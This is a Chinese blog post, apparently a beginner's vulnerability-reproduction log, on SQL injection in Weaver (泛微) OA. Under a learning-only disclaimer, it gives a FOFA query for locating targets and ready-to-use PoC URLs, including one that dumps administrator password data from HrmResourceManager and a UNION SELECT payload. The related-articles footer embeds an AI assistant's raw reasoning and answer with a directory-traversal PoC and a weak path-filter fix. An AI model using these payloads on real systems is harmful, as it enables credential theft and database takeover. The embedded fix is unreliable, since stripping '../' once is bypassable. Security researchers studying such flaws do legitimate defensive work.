泛微OA-SQL注入漏洞

最新推荐文章于 2025-04-22 17:37:01 发布
最新推荐文章于 2025-04-22 17:37:01 发布
阅读量8.9k 收藏 7
点赞数
分类专栏: 渗透测试自学日志之漏洞复现篇 文章标签: sql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/maverickpig/article/details/122649016
版权

2021年进入网络安全行业,作为网络安全的小白,分享一些自学基础教程给大家。希望在自己能体系化的总结自己已有的知识的同时,能对各位博友有所帮助。文章内容比较基础,都是参考了很多大神的文章,各位不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力!
工作中遇到的漏洞,记录一下,本文仅作学习之用,请勿进行网络犯罪,遵守《网络安全法》等相关法律法规。

漏洞描述

泛微OA不同版本都存在SQL注入漏洞

FOFA

app=“泛微-协同办公OA”

漏洞复现

1、泛微OA V8 SQL注入漏洞

POC

http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager

返回了数据库第一条记录的值
通过解密后,可以登录后台(漏洞原理可参考附录文章)

2、泛微OA某版本的SQL注入漏洞(核实中)

POC

http://xxx.xxx.xxx.xxx/Api/portal/elementEcodeAddon/getSqlData?sql=select%20user

3、后台SQL注入

使用测试账户登录,然后访问

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

其中的CONTENT_ID参数能够注射SQL语句。

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

管理员情况下的注入:

http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1

普通用户注入:

http://xx.cn//cowork/CoworkLogView.jsp?id=151

普通用户注入地址:

http://xx.cn/system/basedata/basedata_role.jsp?roleid=32

普通用户注入地址:

http://xx.cn//system/basedata/basedata_hrm.jsp?resourceid=3

继续收集中,未完待续…

参考文章

泛微OA V8 SQL注入漏洞

漏洞复现】OA E-Cology Browser SQL注入漏洞
晚风不及你
05-16 893
OA E-Cology browser存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
漏洞复现】OA E-Cology GetLabelByModule SQL注入漏洞
晚风不及你
05-16 1392
OA E-Cology getLabelByModule存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
OA办公系统后台SQL注入代码审计
最新发布
m0_50125527的博客
04-22 810
其模块化设计可灵活适配各类企业需求,通过自动化工作流和可视化数据看板提升协作效率,结合权限管理与云端存储保障数据安全,助力企业实现无纸化办公与数字化管理转型,降低运营成本的同时优化组织执行力。看一下record方法,这里循环取出arr的值,arr中包含’filename’ => $fname,也没有任何过滤,存在SQL注入。关注不迷路:https://pc.fenchuan8.com/#/index?看看构造方法,过滤了很多SQL关键字,但是我们的参数传递的是base64的值,绕过了对SQL关键字的过滤。
e-office系统存在SQL注入漏洞
holyxp的博客
11-02 1112
e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。
OA e-cology FileDownloadForOutDoc前台SQL注入漏洞
maverickpig的博客
08-09 2426
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。更多复现文章可关注:网安小白成长日记。
漏洞复现】OA E-Cology SignatureDownLoad SQL注入漏洞
晚风不及你
05-15 796
OA E-Cology SignatureDownLoad存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
E-Office SQL注入漏洞复现
0xSec
11-28 2100
E-Office是一款标准化的协同 OA 办公软件,协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
OA8前台sql注入1
08-08
OA8前台SQL注入漏洞详解】 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过构造特定的输入来控制或篡改后台数据库的查询操作。在这个案例中,我们关注的是针对OA8系统的一个前台SQL注入...
E-Cology SQL注入漏洞复现(QVD-2023-15672)
0xSec
07-11 1万+
由于e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。
漏洞复现】E-Cology WorkflowServiceXml SQL注入漏洞
失心少年
07-22 883
E-Cology 是一款协同管理平台,旨在为中大型组织创建全新的高效协同办公环境。包含流程、门户、知识、人事、沟通、客户、项目、财务等 20多个功能模块。该系统WorkflowServiceXml接口处未对用户输入进行有效过滤,直接将其拼接进了SQL语句中,导致SQL注入漏洞,会导致数据泄露。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
E-Bridge checkMobile Sql注入漏洞复现(附脚本)
iSee857的博客
12-23 318
云桥e-Bridge checkMobile接口处存在SQL注入漏洞,未经身份验证的远程攻击者可以利用SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)。
OA e-cology9 存在 sql 注入
nnn2188185的博客
04-29 1646
信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发 E-Cology9 协同办公系统是一套基于 JSP 及 SQL Server 数据库的 OA 系统,包括知识文档管理、人力资源管理、客户关系管理、项目管理、财务管理、工作流程管理、数据中心等打造协同高效的企业管理环境,突破企业人、财、物、信息、流程等各种资源之间的屏障,并将集团各企业、企业各部门、各分支机构、以及企业与外部的供应商、分销商、客户及其他合作伙伴等整合在一个统一的平台上,使企业变成一个电子化的内外部协同工作的组织。
漏洞复现 OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 8496
漏洞复现 OA E-Cology V9 browser.jsp SQL注入漏洞
2021-OA V8 SQL注入漏洞
weixin_43227251的博客
04-13 1万+
OA V8 SQL注入漏洞 漏洞描述 OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 OA V8 FOFA app=“-协同办公OA漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
e-cology9 SQL注入漏洞复现(QVD-2023-5012)
ZL_1618的博客
03-09 2390
协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
OA V8 SQL注入漏洞和文件上传漏洞
热门推荐
qq_52469895的博客
04-11 1万+
fofa语句 app="-协同办公OA" SQL注入OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
漏洞复现】OA E-Cology HrmCareerApplyPerView SQL注入漏洞
晚风不及你
05-15 832
OA E-Cology HrmCareerApplyPerView存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器
漏洞复现】ecology OA系统某接口存在数据库配置信息泄露漏洞
Summer's blog
05-13 1万+
ecology OA系统某接口存在数据库配置信息泄露漏洞,复现的时候踩到的那些坑!经验分享与总结。
漏洞复现】OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
李火火的安全圈
05-10 3362
协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。新一代移动办公平台E-Cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件,实体签章的方式,OA E-Cology平台browser.jsp处存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
OA-E-Cology-JqueryFileTree.jsp目录遍历漏洞测试背景
03-30
<think>嗯,用户问的是OA E-Cology JqueryFileTree.jsp目录遍历漏洞的背景、测试方法以及修复措施。首先,我需要回忆一下这个漏洞的相关信息。记得这个漏洞涉及目录遍历,可能通过构造特定的请求参数来访问未授权的文件路径。用户提到的参考引用里有POC的例子,应该是在hrm模块下的jqueryFileTree.jsp,通过dir参数传递相对路径,比如../../来遍历上级目录。 首先,背景方面,这个漏洞属于文件目录遍历漏洞,攻击者可以利用它读取服务器上的敏感文件,比如配置文件、日志或者系统文件。OA作为企业常用的办公系统,存在这样的漏洞风险较高,可能导致信息泄露,进而被进一步利用进行攻击。 测试方法的话,用户可能需要知道如何验证漏洞是否存在。根据引用中的POC,测试时需要构造特定的URL,替换dir参数的值,尝试访问系统目录。比如使用/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../,如果返回了目录列表或文件内容,就说明存在漏洞。需要注意测试时的权限,可能需要未授权的访问或者低权限用户的权限。 修复措施方面,官方应该会有补丁发布,用户需要及时更新。另外,可以限制dir参数的输入,过滤掉../这样的路径遍历字符。还有权限控制,确保该接口只能被授权用户访问,同时设置文件访问的白名单,限制可访问的目录范围。Web应用防火墙也是一个临时解决方案,可以拦截恶意请求。 用户可能还关心如何检测是否已经修复了漏洞,可能需要再次测试或者查看系统版本。另外,相关的漏洞是否有其他变种或者类似接口存在同样的问题,比如其他jsp文件是否也有类似的参数处理问题。同时,用户可能需要了解该漏洞的CVSS评分和影响程度,以及是否有公开的利用代码,以便评估风险。 需要确保回答中提到的测试方法不会对生产环境造成损害,建议在测试环境中进行,或者获得授权。另外,修复措施要具体,比如如何过滤参数,使用正则表达式替换../等字符。还可以提到日志监控,检测是否有异常的目录遍历请求,帮助及时发现攻击行为。 可能用户没有明确提到的需求包括漏洞的发现时间、受影响的具体版本,以及是否有其他相关漏洞需要一并处理,比如引用中的SQL注入漏洞。在回答中可以适当提及,但主要聚焦在目录遍历漏洞上。 最后,要确保回答结构清晰,分点说明背景、测试方法、修复措施,并生成相关问题,帮助用户进一步了解相关主题。同时,引用标识要正确对应到参考内容,避免混淆。</think>### OA E-Cology JqueryFileTree.jsp目录遍历漏洞分析 #### 一、漏洞背景 该漏洞存在于OA E-Cology系统的`jqueryFileTree.jsp`组件中,属于**未授权目录遍历漏洞**。攻击者可通过构造特殊的`dir`参数,绕过路径限制访问服务器任意目录[^1]。例如: ```url /hrm/hrm_e9/.../jqueryFileTree.jsp?dir=/page/resource/userfile/../../ ``` 此漏洞允许读取敏感文件(如配置文件、日志文件),严重时可能导致系统权限泄露[^1]。 --- #### 二、测试方法 **验证步骤(POC):** 1. 构造测试URL(需替换目标域名): ```url http://target-domain/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../../ ``` 2. 发送HTTP请求,观察响应: - 返回**目录结构列表**或**文件内容**表示漏洞存在 - 返回空内容或错误提示表示已修复 **注意:** - 测试需在授权范围内进行 - 使用Burp Suite/Postman工具更易观察响应细节 --- #### 三、修复建议 1. **官方补丁升级** 及时更新OA至最新安全版本[^1] 2. **参数过滤** 在`jqueryFileTree.jsp`中添加路径过滤逻辑: ```java String safeDir = dir.replaceAll("\\.\\./", ""); // 过滤../字符 ``` 3. **访问控制** 通过Nginx/Apache配置限制接口访问: ```nginx location ~* /jqueryFileTree.jsp { allow 192.168.1.0/24; # 仅允许内网IP访问 deny all; } ``` 4. **文件访问白名单** 限制可访问的目录范围(如仅允许`/page/resource/userfile/`) --- §§ 相关问题 §§ 1. 如何检测OA系统是否受多个历史漏洞影响? 2. 目录遍历漏洞与任意文件读取漏洞有何区别? 3. 企业OA系统常见的安全防护措施有哪些? [^1]: OA E-Cology目录遍历漏洞验证方法 [^2]: OA SQL注入漏洞背景说明
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值